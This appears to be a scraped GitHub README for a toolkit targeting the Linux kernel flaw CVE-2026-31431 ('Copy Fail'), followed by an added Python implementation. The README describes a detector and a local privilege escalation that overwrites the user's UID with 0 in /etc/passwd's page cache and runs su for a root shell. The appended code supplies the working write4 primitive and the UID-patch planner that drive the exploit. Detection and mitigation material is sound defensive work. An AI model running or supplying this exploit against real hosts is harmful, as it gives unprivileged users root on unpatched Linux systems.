# rootsecdev/cve_2026_31431

Repository `rootsecdev/cve_2026_31431` (owner `rootsecdev`, default branch `main`, language Python, no license recorded). Description: "Exploit POC for CVE_2026_31431". 562 stars, 115 forks, 5 watchers, 4 open issues; last updated 2026-06-12.

# CVE-2026-31431 ("Copy Fail") Toolkit

Detector and proof-of-concept LPE for the Linux `algif_aead` /
`authencesn` page-cache scratch-write bug disclosed 2026-04-29.

Disclosure writeup: <https://xint.io/blog/copy-fail-linux-distributions>

## Authorization

Use only on hosts you own or are explicitly engaged to assess. The LPE
modifies in-memory state (page cache) only, but the technique is real
privilege escalation; running it on systems without authorization is
illegal in most jurisdictions.

## Vulnerability summary

`algif_aead` runs AEAD operations in-place (`req->src == req->dst`).
When the source data is fed in via `splice()` from a regular file, the
destination scatterlist contains references to the file's page-cache
pages, i.e. the kernel will write into them. The
`authencesn(hmac(sha256),cbc(aes))` algorithm then performs a 4-byte
"scratch" write of the AAD's `seqno_lo` field (bytes 4-7 of the
sendmsg-supplied AAD) into that destination, corrupting the page-cache
copy of the file.

Because the on-disk file is never modified, there is no on-disk
signature; the corruption is observed only by readers that share the
page cache. `/etc/passwd` and `/usr/bin/su` are both world-readable, so
an unprivileged local user can corrupt the running kernel's view of
either.

Affected: kernels carrying commit `72548b093ee3` (in-place AEAD, 2017)
without the upstream revert. The disclosure confirmed Ubuntu 24.04 LTS,
Amazon Linux 2023, RHEL 14.3, and SUSE 16, but the underlying primitive
predates that range.

## Files

| File | Purpose |
| --- | --- |
| `test_cve_2026_31431.py` | Non-destructive detector. Operates on a sentinel file in a temp dir; never touches system binaries. |
| `exploit_cve_2026_31431.py` | LPE. Flips the running user's UID to 0 in `/etc/passwd`'s page cache, then invokes `su` for a root shell. |

Both scripts are pure Python 3.10+ stdlib (`os.splice()` is the 3.10 dependency).

## Quick start

```sh
# 1. Detect
python3 test_cve_2026_31431.py
#   exit 0 = not vulnerable, 2 = vulnerable, 1 = test error

# 2. Exploit (interactive: su will prompt for your own password)
python3 exploit_cve_2026_31431.py --shell
```

## Detector usage

```
python3 test_cve_2026_31431.py
```

What it does:

1. Confirms `AF_ALG` and the `authencesn(hmac(sha256),cbc(aes))`
   algorithm are reachable from an unprivileged process.
2. Creates a 4 KiB sentinel file in a temp directory and populates the
   page cache.
3. Sends 8 bytes of AAD inline via `sendmsg`+cmsg with `seqno_lo` set to
   the marker `PWND`, then `os.splice()`s 32 bytes of the sentinel's
   page-cache page into the AF_ALG op socket.
4. Calls `recv()` to drive decryption. The auth check fails with
   `EBADMSG`; the scratch write fires regardless.
5. Re-reads the file (page cache, not disk) and looks for the marker.

Output classes:

- `Precondition not met`: `AF_ALG` or `authencesn` unavailable. Exit 0.
- `VULNERABLE to CVE-2026-31431`: marker `PWND` landed in the spliced
  page. Exit 2.
- `Page cache MODIFIED via in-place AEAD splice path`: the page was
  written to but the marker did not land at the expected position.
  Treat as vulnerable. Exit 2.
- `Page cache intact`: patched. Exit 0.

The detector never touches `/usr/bin/su`, `/etc/passwd`, or any other
file outside the temp directory it creates, and that file is removed on
exit.

## LPE usage

```
python3 exploit_cve_2026_31431.py            # patch only, print next steps
python3 exploit_cve_2026_31431.py --shell    # patch and exec `su <user>`
```

What it does:

1. Looks up the running user's line in `/etc/passwd` and finds the
   byte offset of the 4-character UID field.
2. Issues one `write4` against that offset, replacing the UID with
   `0000`.
3. Calls `pwd.getpwnam(user)` to confirm libc now reports UID 0.
4. With `--shell`, `execvp("su", ["su", user])`. Enter your own
   password. PAM validates against `/etc/shadow` (untouched), then
   `setuid(getpwnam(user).pw_uid)` lands at 0.

### Requirements

- Running user has a 4-digit UID (1000-9999). 1- to 3-digit UIDs
  require multi-shot writes; extend `write4` accordingly.
- No NSS caching daemon (`nscd`, `sssd`, `systemd-userdbd`) is masking
  `/etc/passwd` reads. If `getpwnam` still returns the real UID after
  the patch, restart or bypass the cache, or pick a different user.
- The `/etc/passwd` page must remain in cache between the patch and the
  `su` exec. In practice this is reliable on any system with normal
  memory pressure.

### Reverting

The on-disk `/etc/passwd` is unchanged.

**Dry-run** (`exploit_cve_2026_31431.py` without `--shell`) auto-evicts
the corrupted page on exit via `POSIX_FADV_DONTNEED`, so UID-to-name
lookups go back to normal immediately.

**After `--shell`**, the page is left corrupted until you clear it.
While it is corrupted, anything resolving the original UID (1000) to a
name (e.g. `ls`, file managers, scp/sftp ownership checks) will fail or
show numeric IDs. To clear:

```sh
# unprivileged - request page-cache eviction for /etc/passwd:
python3 -c "import os; fd=os.open('/etc/passwd', os.O_RDONLY); \
            os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED); os.close(fd)"

# from the root shell:
echo 3 > /proc/sys/vm/drop_caches
```

A reboot also clears it.

## How `write4` works

```
sendmsg([8-byte AAD], cmsg=[ALG_SET_OP=DECRYPT, ALG_SET_IV, ALG_SET_AEAD_ASSOCLEN=8],
        flags=MSG_MORE)
splice(target_fd, pipe_w, 32, offset_src=file_offset)
splice(pipe_r, op_fd, 32)
recv(op_fd)   # EBADMSG; scratch write has already landed
```

The 4 bytes from AAD positions 4-7 (`seqno_lo`) are written by
`authencesn` into the destination scatterlist, which on this code path
is the page-cache page we spliced from `target_fd`. The landing offset
within the page corresponds to the `offset_src` we passed to `splice()`.

## Mitigation

Until the patched kernel reaches your distro:

```sh
sudo tee /etc/modprobe.d/disable-algif-aead.conf <<<'install algif_aead /bin/false'
sudo rmmod algif_aead 2>/dev/null
```

After applying, `test_cve_2026_31431.py` should report `Precondition
not met` and exit 0. Two caveats: `rmmod` refuses while any process
still holds an `AF_ALG` AEAD socket, and if `algif_aead` is built into
the kernel (`CONFIG_CRYPTO_USER_API_AEAD=y` in `/boot/config-$(uname -r)`)
the modprobe rule has no effect and only the kernel update closes the
hole.

The upstream fix reverts in-place AEAD operations to out-of-place,
keeping page-cache pages out of writable scatterlists.

## References

- Xint disclosure writeup: <https://xint.io/blog/copy-fail-linux-distributions>
- CVE-2026-31431

## Page summary

This project provides a detection tool and exploit code for CVE-2026-31431. Its core components are a non-destructive detection script, `test_cve_2026_31431.py`, used to confirm whether a system is affected by the vulnerability, and a privilege-escalation script, `exploit_cve_2026_31431.py`, which changes the current user's UID to 0 to obtain root. Both scripts are written entirely against the Python 3.10+ standard library. The tool is intended for Linux security assessments, in particular of environments running specific kernel versions (such as Ubuntu 24.04 LTS and Amazon Linux 2023) that have not applied the relevant patch. Note that these tools should only be used for testing or assessment with authorization.

Last indexed: 2026-06-11 02:40:27.
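The detector flow, the UID-field lookup of the LPE, and the `write4` sequence above, as one added example in the toolkit's language (this is not the project's own `test_cve_2026_31431.py` or `exploit_cve_2026_31431.py`). The pure helpers build the `AF_ALG` messages and find the UID field offset and can be checked offline; `do_write4()` is the Linux-only syscall driver and runs only under `__main__`. Constants are taken from `<linux/if_alg.h>`, and the `ALG_SET_KEY` blob layout from the kernel's `crypto_authenc_extractkeys()`; the placeholder key, IV, SPI bytes, 16-byte tag size and the `detect()` result strings are this example's assumptions, not the README's. Use only on hosts you are authorized to test.

```python
"""Added example, not the project's scripts: write4 primitive + detector flow.
Key/IV/SPI/tag-size values below are placeholders (assumed), not from the README."""
import errno
import os
import socket
import struct
import tempfile

# <linux/if_alg.h> values; Python exposes them on Linux, fall back to the header
# constants elsewhere so the pure helpers stay importable for inspection.
AF_ALG = getattr(socket, "AF_ALG", 38)
SOL_ALG = getattr(socket, "SOL_ALG", 279)
ALG_SET_KEY = getattr(socket, "ALG_SET_KEY", 1)
ALG_SET_IV = getattr(socket, "ALG_SET_IV", 2)
ALG_SET_OP = getattr(socket, "ALG_SET_OP", 3)
ALG_SET_AEAD_ASSOCLEN = getattr(socket, "ALG_SET_AEAD_ASSOCLEN", 4)
ALG_SET_AEAD_AUTHSIZE = getattr(socket, "ALG_SET_AEAD_AUTHSIZE", 5)
ALG_OP_DECRYPT = getattr(socket, "ALG_OP_DECRYPT", 0)
MSG_MORE = getattr(socket, "MSG_MORE", 0x8000)
CRYPTO_AUTHENC_KEYA_PARAM = 1   # rtattr type inside the authenc key blob

ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"
CHUNK = 32        # bytes spliced per write4, as in the README
AAD_LEN = 8       # spi(4) + seqno_lo(4)
MARKER = b"PWND"  # detector marker from the README
TAG_LEN = 16      # hmac(sha256) authsize used here (assumed)


def build_aad(value: bytes, spi: bytes = b"\x00" * 4) -> bytes:
    """8-byte AAD; bytes 4..7 (seqno_lo) are the 4 bytes authencesn scratch-writes."""
    if len(value) != 4:
        raise ValueError("write4 writes exactly 4 bytes")
    return spi + value


def build_cmsgs(iv: bytes) -> list:
    """Ancillary data for the AAD-carrying sendmsg(): OP=DECRYPT, IV, ASSOCLEN=8.
    af_alg_iv is {u32 ivlen; u8 iv[]}; the other two options are a bare u32."""
    return [
        (SOL_ALG, ALG_SET_OP, struct.pack("=I", ALG_OP_DECRYPT)),
        (SOL_ALG, ALG_SET_IV, struct.pack("=I", len(iv)) + iv),
        (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, struct.pack("=I", AAD_LEN)),
    ]


def build_authenc_key(auth_key: bytes, enc_key: bytes) -> bytes:
    """ALG_SET_KEY blob for authenc/authencesn as crypto_authenc_extractkeys() parses it:
    struct rtattr {u16 rta_len; u16 rta_type=KEYA_PARAM} + be32 enckeylen + authkey + enckey."""
    param = struct.pack("!I", len(enc_key))
    rta = struct.pack("=HH", 4 + len(param), CRYPTO_AUTHENC_KEYA_PARAM)
    return rta + param + auth_key + enc_key


def find_uid_field(passwd: bytes, user: str):
    """(byte offset, uid text) of `user`'s UID field in passwd(5) data, or None."""
    pos = 0
    for line in passwd.split(b"\n"):
        fields = line.split(b":")
        if len(fields) >= 3 and fields[0] == user.encode():
            return pos + len(fields[0]) + len(fields[1]) + 2, fields[2].decode()
        pos += len(line) + 1
    return None


def plan_uid_patch(passwd: bytes, user: str):
    """(offset, b"0000") for the single write4 the LPE issues, or None when the UID
    is not exactly 4 digits (the README's single-shot requirement)."""
    hit = find_uid_field(passwd, user)
    if hit is None or len(hit[1]) != 4 or not hit[1].isdigit():
        return None
    return hit[0], b"0000"


def do_write4(target: str, file_offset: int, value: bytes,
              key: bytes = b"K" * 48, iv: bytes = b"\x00" * 16) -> None:
    """Linux-only: sendmsg(AAD, MSG_MORE) -> splice(file->pipe) -> splice(pipe->op)
    -> recv(). EBADMSG from recv() is the expected failed auth check."""
    tfm = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    try:
        tfm.bind(("aead", ALG_NAME))
        tfm.setsockopt(SOL_ALG, ALG_SET_KEY, build_authenc_key(key[:32], key[32:]))
        tfm.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, TAG_LEN)
        op, _ = tfm.accept()
        with op:
            op.sendmsg([build_aad(value)], build_cmsgs(iv), MSG_MORE)
            pr, pw = os.pipe()
            tfd = os.open(target, os.O_RDONLY)
            try:
                n = os.splice(tfd, pw, CHUNK, offset_src=file_offset)
                os.splice(pr, op.fileno(), n)   # page-cache page now in the dst sgl
            finally:
                for fd in (tfd, pr, pw):
                    os.close(fd)
            try:
                op.recv(AAD_LEN + CHUNK)
            except OSError as e:
                if e.errno != errno.EBADMSG:
                    raise
    finally:
        tfm.close()


def detect(tmpdir: str) -> str:
    """Detector flow: zeroed 4 KiB sentinel, one write4 of MARKER at offset 0,
    re-read through the page cache; returns a README-style result class."""
    path = os.path.join(tmpdir, "sentinel")
    with open(path, "wb") as f:
        f.write(b"\x00" * 4096)
    with open(path, "rb") as f:
        f.read()                            # populate the page cache
    try:
        do_write4(path, 0, MARKER)
    except OSError as e:
        if e.errno in (errno.ENOENT, errno.EAFNOSUPPORT):
            return "precondition not met"   # no AF_ALG / authencesn reachable
        return "test error: %s" % e.strerror
    with open(path, "rb") as f:
        data = f.read()
    os.unlink(path)
    if MARKER in data:
        return "vulnerable"
    return "page cache modified" if data != b"\x00" * 4096 else "intact"


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        print(detect(d))
```

`plan_uid_patch()` is what feeds `do_write4()` in the LPE case (`do_write4("/etc/passwd", offset, b"0000")`); it returns `None` for `root`-style short UIDs instead of emitting a 4-byte write that would clobber the field separator. The key set here only has to satisfy the bind; the page's point is that the scratch write lands before the tag is ever checked.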